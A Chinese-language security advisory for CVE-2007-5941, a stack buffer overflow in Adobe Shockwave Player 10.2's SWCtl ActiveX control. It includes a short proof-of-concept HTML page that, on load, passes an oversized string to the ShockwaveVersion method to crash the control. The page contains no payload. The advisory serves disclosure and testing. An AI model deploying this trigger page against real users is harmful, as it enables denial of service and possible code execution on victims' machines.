发布日期：2007-11-08
更新日期：2007-11-20

受影响系统：

Adobe Shockwave Player 10.2

描述：

---

BUGTRAQ  ID: 26388
CVE(CAN) ID: CVE-2007-5941

Adobe Shockwave Player是播放使用Macromedia和Adobe Director制作的网页内容的软件。

Adobe Shockwave Player 10的SWCtl.SWCtl ActiveX控件存在栈缓冲区溢出漏洞，允许远程攻击者通过向ShockwaveVersion方法传递超长的参数造成拒绝服务并执行任意代码。

<*来源：Elazar Broad （elazarb@earthlink.net）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";
     while (s.length < 768 * 768) s=s+s;
  
     var obj = new ActiveXObject("SWCtl.SWCtl"); //{233C1507-6A77-46A4-9443-F871F945D258}    

     obj.ShockwaveVersion(s);
    }
  </script>

</head>  
<body onload="JavaScript: return Check();" />
</html>

建议：

---

厂商补丁：

Adobe
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://get.adobe.com/shockwave/

浏览次数：1770
严重程度：0（网友投票）